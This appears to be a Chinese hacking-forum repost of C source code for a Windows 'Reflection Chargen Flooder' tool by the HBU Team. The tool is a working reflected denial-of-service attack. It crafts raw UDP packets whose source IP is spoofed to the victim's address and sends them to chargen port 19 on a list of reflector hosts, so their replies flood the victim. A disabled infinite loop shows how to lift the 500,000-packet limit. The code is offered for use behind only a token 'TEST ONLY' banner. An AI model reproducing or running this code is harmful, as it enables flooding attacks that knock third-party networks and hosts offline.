信息来源:邪恶八进制 中国
复制内容到剪贴板
代码:
//反射IP每行一个写在chargen.txt里
================================
#include <stdlib.h>
#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#define SOURCE_PORT 8000
#define DEST_PORT 19
int x=-1,k,j,rndX=0;
struct IP
{
char ip[20];
};
struct IP IPtemp[32767];
typedef struct ip_hdr //定义IP首部
{
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;
typedef struct udpshdr{ //UDP伪首部
unsigned int sourceIp;//IP头中的源地址
unsigned int destIp;//IP头中的目的地址
unsigned char mbz;//为0值
unsigned char protoNum;//8位协议号
unsigned short udplen;//udp数据包的长度
} UDP_SHDR;
typedef struct udp_hdr //UDP首部
{
unsigned short sourceport;
unsigned short destport;
unsigned short udp_length;
unsigned short udp_checksum;
} UDP_HEADER;
int GetIPNum(){
int i;
if(rndX++==65535) rndX=0;
srand(rndX);
i=rand()%x+1;
return i;
}
//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size )
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
void Intro(){
printf("==================R-Series=====================\n");
printf("H.B.U Team R-Series Tools DEMO Version\n");
printf("\n");
printf("-=-=-Reflection Chargen Flooder-=-=-\n");
printf("\n");
printf("(C)2002 HBU Team,written by LK007\n");
printf("E-MAIL:lk007@163.com [email]cjc007@cnuninet.com[/email]\n");
printf("Please visit: [url]www.s8s8.net[/url] [url]www.heibai.net[/url]\n");
printf("===============================================\n");
printf("WARNING!TEST ONLY!\n");
printf("This Version can only send 500,000 packets!\n\n");
}
void LoadFile()
{
FILE *fp;
char str[256];
if((fp=fopen("chargen.txt","rt"))==NULL)
{
printf("Can not open Reflection-IP List!\n");
printf("Please create a text file 'chargen.txt' which\n");
printf("includes Reflection-IP(s) on the Application Path!\n");
exit(0);
}
while (!feof(fp))
{
fgets(str,sizeof(str),fp);
x++;
for (k=0;k<16;k++)
{
if(str[k]=='\n'){
str[k]='\0';}
IPtemp[x].ip[k]=str[k];
}
}
fclose(fp);
printf("Loading Reflection IP List...\n\n");
printf("Reflection IP List Loaded.\n");
printf("\nTotal IP List:%d\n\n",x);
}
int main(int argc, char* argv[])
{
WSADATA WSAData;
char ulTargetIP[20], ulFakeIP[20];
SOCKET sock;
SOCKADDR_IN addr_in;
BOOL flag;
char buf[3] = {'H','B','U'};
IP_HEADER ipHeader;
UDP_HEADER udpHeader;
int iTotalSize, iUdpCheckSumSize, i;
long counter;
char sendbuf[256] = {0};
char *ptr = NULL;
const int SNDBUF = 0;
const int BROADCAST = true;
if (argc < 2)
{
Intro();
printf("Usage: %s [DestIP]\n",argv[0]);
return false;
}
Intro();
LoadFile();
strcpy(ulFakeIP,argv[1]);
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return false;
}
sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);
if (sock == INVALID_SOCKET)
{
printf("socket Error!\n");
return false;
}
flag = true;
if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("设置IP数据失败!此程序需要Win2000/XP支持!\n");
exit(0);
return false;
}
if (setsockopt(sock, SOL_SOCKET, SO_SNDBUF, (const char*)&SNDBUF, sizeof(SNDBUF))==SOCKET_ERROR)
{
printf("Set SO_SNDBUF failed.Error:%d",WSAGetLastError());
return 0;
}
if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (const char*)&BROADCAST, sizeof(BROADCAST))==SOCKET_ERROR)
{
printf("Set SO_BROADCAST failed.Error:%d",WSAGetLastError());
return 0;
}
////////BEGIN FLOOD//////////////
printf("Dest Host:%s\n\n",ulTargetIP);
for(counter=0;counter<500000;counter++){
//while(1){
strcpy(ulTargetIP,IPtemp[GetIPNum()].ip);
printf("Now using %s for Reflection...\n",ulTargetIP);
addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(DEST_PORT);
addr_in.sin_addr.S_un.S_addr = inet_addr(ulTargetIP);
iTotalSize=sizeof(ipHeader)+sizeof(udpHeader)+sizeof(buf);
ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(iTotalSize);
ipHeader.ident=0;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_UDP;
ipHeader.checksum=0;
ipHeader.sourceIP =inet_addr(ulFakeIP);
ipHeader.destIP = inet_addr(ulTargetIP);
udpHeader.sourceport = htons(SOURCE_PORT);
udpHeader.destport = htons(DEST_PORT);
udpHeader.udp_length = htons(sizeof(udpHeader)+sizeof(buf));
udpHeader.udp_checksum = 0;
ptr = NULL;
//计算UDP校验和
ZeroMemory(sendbuf,sizeof(sendbuf));
ptr=sendbuf;
iUdpCheckSumSize=0;
udpHeader.udp_checksum = 0;
memcpy(ptr,&ipHeader.sourceIP,sizeof(ipHeader.sourceIP));
ptr +=sizeof(ipHeader.sourceIP);
iUdpCheckSumSize+=sizeof(ipHeader.sourceIP);
memcpy(ptr,&ipHeader.destIP,sizeof(ipHeader.destIP));
ptr +=sizeof(ipHeader.destIP);
iUdpCheckSumSize +=sizeof(ipHeader.destIP);
ptr++;
iUdpCheckSumSize++;
memcpy(ptr,&ipHeader.proto,sizeof(ipHeader.proto));
ptr +=sizeof(ipHeader.proto);
iUdpCheckSumSize +=sizeof(ipHeader.proto);
memcpy(ptr,&udpHeader.udp_length,sizeof(udpHeader.udp_length));
ptr +=sizeof(udpHeader.udp_length);
iUdpCheckSumSize +=sizeof(udpHeader.udp_length);
memcpy(ptr,&udpHeader,sizeof(udpHeader));
ptr +=sizeof(udpHeader);
iUdpCheckSumSize += sizeof(udpHeader);
for(i = 0; i < sizeof(buf); i++,ptr++){
*ptr = buf[i];
iUdpCheckSumSize += sizeof(buf);
}
udpHeader.udp_checksum = checksum((USHORT*)sendbuf,iUdpCheckSumSize);
ZeroMemory(sendbuf,sizeof(sendbuf));
memcpy(sendbuf,&ipHeader,sizeof(ipHeader));
memcpy(sendbuf+sizeof(ipHeader),&udpHeader,sizeof(udpHeader));
memcpy(sendbuf+sizeof(ipHeader)+sizeof(udpHeader),buf,sizeof(buf));
if (sendto(sock, sendbuf, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR)
{
printf("Send Error!\n");
}
}
printf("\n Send Completed!\n");
if (sock != INVALID_SOCKET)
closesocket(sock);
WSACleanup();
return 0;
}
===============================
